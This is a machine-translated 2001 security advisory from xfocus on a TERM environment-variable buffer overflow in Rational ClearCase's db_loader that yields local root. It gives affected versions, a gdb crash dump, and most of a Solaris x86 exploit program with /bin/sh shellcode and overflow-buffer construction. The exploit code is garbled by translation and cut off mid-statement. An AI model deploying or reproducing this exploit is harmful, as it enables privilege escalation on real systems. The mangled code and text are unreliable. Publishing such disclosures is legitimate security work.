[Actual combat] ClearCase DB

ClearCase DB_Loader environment variable overflow vulnerability

Create time: 2001-11-10 Article properties: Original article Source: http://xfocus.org article Submitted: Inburst (Inburst_at_263.net) ------------------- -------------- Clearcase DB_Loader environment variable overflow vulnerability ----------------------------- ----- Publish information -------- Discovery Date: August 2001 Announcement date: November 1, 2001: Virtualcat@xfocus.org Website: http://xfocus.org Simple Description ------ Rational's software configuration management tool Clearcase is mainly used for Windows and UNIX development environments. ClearCase provides a comprehensive configuration management feature - including version control, spatial management, establishment management and process control, without software developers to change their existing environment, tools, and way of working. The administrative tool exists with a DB_Loader program that is installed by default settings, but when you use a long environment variable "TERM", it will cause buffer overflow, which may result in system output.

Affected software version and platform -------------------- Impact Version: ClearCase 3.2 , 4.0, 4.1, Impact System: Linux, Solaris Sparc, Solaris X86, AIX, HP, Digital, Irix, SCO etc. Details ---- $ TERM = `Perl -e 'Print" a "x550' $ export termit $ / usr / attra / etc / db_loaderbus error $ GDB DB_LOADER CORE -q (no debugging symbols found) ... Core Was Generated By `./db_loader '

.Cannot access memory at address 0xffffffffff3e1b80 # 0 0xf0db8 in imsg_fputs () (gdb) bt # 0 0xf0db8 in imsg_fputs () Can not access memory at address 0x41414179 (gdb) i regg0 0x0 0g1 0x7b000 503808g2 0x13cf84 1298308g3 0x0 0g4 0xf6c2c 1010732g5 0x0 0g6 0x0 0g7 0x143d58 1326424o0 0xffffffff -1o1 0x1 1o2 0xffbef054 -4263852o3 0xf0c3c 986172o4 0xffbeed8a -4264566o5 0xffffffff -1sp 0xffbeef70 -4264080o7 0xf0db0 986544l0 0x41414141 1094795585l1 0x41414141 1094795585l2 0x41414141 1094795585l3 0x41414141 1094795585l4 0x41414141 1094795585l5 0x41414141 1094795585l6 0x41414141 1094795585l7 0x41414141 1094795585 i0 0x41414141 1094795585i1 0x41414141 1094795585i2 0x41414141 1094795585i3 0x41414141 1094795585i4 0x41414141 1094795585i5 0x41414141 1094795585fp 0x41414141 1094795585i7 0x41414141 1094795585y 0x0 0psr 0xfe801007 -25161721 icc: N ---, pil: 0, s: 0, ps: 0, et: 0, cwp: 7wim 0x0 0tbr 0x0 0PC 0xF0DB8 986552NPC 0xF0DBC 986556FPSR 0x0 0 RD: N, TEM: 0, NS: 0, Ver: 0, FTT: 0, QNE: 0, Fcc: =, AEXC: 0, CEXC: 0CPSR 0x0 0 (GDB) Local User You can get superuser privileges through this vulnerability.

Test procedures -------- ClearCase_x86exp.c / * Rational ClearCase TERM environment variable buffer overflow exploit * test it again solaris x86 7, bug found by virtualcat@xfocus.org* xploit by xundi@xfocus.org* website: http://xfocus.h> #include #include #define ret_dis 550 # define nop 0x90 # define nnop 512 # define env_var "Term" #define User_upper_magic 0x08047fff / * shell code Taken from pablo sor's "mailx -f" exploit code * / char shellcode [] = "/ xeb / x48 / x9a / xff / xff / xff / x5e / x31 / XC0 / X89 / X46 / XB4 "" / x88 / x46 / xb9 / x88 / x46 / x07 / x89 / x46 / x0c / x31 / xc0 / x50 / xdf "/ xff / xff / xff / X83 / XC4 / X04 / X31 / XC0 / X50 / XB0 / X17 / XE8 / XD2 / XFF / XFF / XFF "/ X83 / XC4 / X04 / X31 / XC0 / X50 / X8D / X5E / X08 / X53 / X8D / X1E / X89 / X5E / X08 / X53 "" / XB0 / X3B / XE8 / XBB / XFF / X0C / XE8 / XBB / XFF / XFF / XFF / X2F "" / x62 / x69 / X6E / X2F / X73 / X68 / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF "; INT GET_ESP () {__ASM __ (" MOV% ESP,% EAX ");} in t getEnvAddr (const char * envPtr) {int envAddr = NULL; int retCode = 0; char * charPtr = (char *) get_esp (); / * Search for the starting address of the environment string for * / / * the specified environment Variable * / while (unsigned int) USER_UPPER_MAGIC) {Retcode = MEMCMP ((unsigned char *) Charptr , envptr, 4); / * Found * / if (retcode == 0) {envaddr = INT) (Charptr - 1); Break;}} Return Envaddr;} int main (int Argc, char ** argv) {char buff [256] =

{0}; int * buffptr = null; char * charptr = null; int Retdr = 0; int RetValue = 0; int bufflen = 0; int adjustment = 0; int Strlen = 0; int alignment = 0; int Diff = 0; INT i; int shellcodelen = strlen (shellcode); if (argc == 2) {adjustment = ATOI (Argv [1]);} bufflen = strlen (env_var) RET_DIS NNOP shellcodelen 1; charPtr = getenv (ENV_VAR); / * Adjust the stupid alignment * / strLen = strlen (charPtr) 1; alignment = strLen% 4; if (alignment = 0!) {alignment = 4 - alignment; strLen = alignment ;} alignment = buffLen% 4; if (alignment = 0!) {alignment = 4 - alignment; buffLen = alignment;} retValue = getEnvAddr (ENV_VAR); diff = buffLen - strLen; retAddr = retValue - diff strlen (ENV_VAR ) 1; alignment = RetadDR% 4; if (alignment! = 0) {alignment = 4 - alignment;} Retaddr = RET_DIS alignment adjustment; / * Allocate memory for the evil buffer * / buffPtr = (char *) malloc (buffLen); if (buffPtr = NULL!) {Strcpy (buffPtr, ENV_VAR); strcat (buffPtr, "=" CHARPTR = (CHAR *) (BuffPtr Strlen (BuffPTR)); / * Fill the rest of the buffer with 'a' * / memset (Charptr, 0x41, Bufflen - Strlen (BUFFPTR) -4); / * Butt In the return address * / intptr = (int *); * INTPTR = Retdr;